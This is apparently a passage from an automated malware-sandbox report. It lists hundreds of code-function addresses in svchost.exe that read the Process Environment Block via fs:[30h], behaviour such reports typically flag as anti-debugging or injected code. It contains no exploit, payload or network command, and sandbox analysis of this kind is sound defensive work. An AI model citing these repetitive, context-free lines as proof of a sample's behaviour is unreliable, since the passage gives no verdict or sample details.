          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]2_2_038AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]2_2_03872619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]2_2_0384E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]2_2_03866620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]2_2_03868620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]2_2_0383262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]2_2_0384C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]2_2_03862674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]2_2_03832582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]2_2_03832582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]2_2_03864588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]2_2_0386E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]2_2_038365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]2_2_038325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]2_2_038C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]2_2_038EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]2_2_038364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]2_2_038644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]2_2_038BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]2_2_038304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]2_2_0382C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]2_2_0386A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]2_2_038EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]2_2_0382645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]2_2_0385245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]2_2_038BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]2_2_038DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]2_2_0385EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]2_2_038BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]2_2_038FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]2_2_038D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]2_2_038DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]2_2_0382CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]2_2_03904A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]2_2_03868A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]2_2_03886AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]2_2_03830AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]2_2_038BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]2_2_0386CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]2_2_0385EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]2_2_0386CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]2_2_038DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]2_2_038B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]2_2_038C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]2_2_038649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]2_2_038FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]2_2_038BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]2_2_038BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
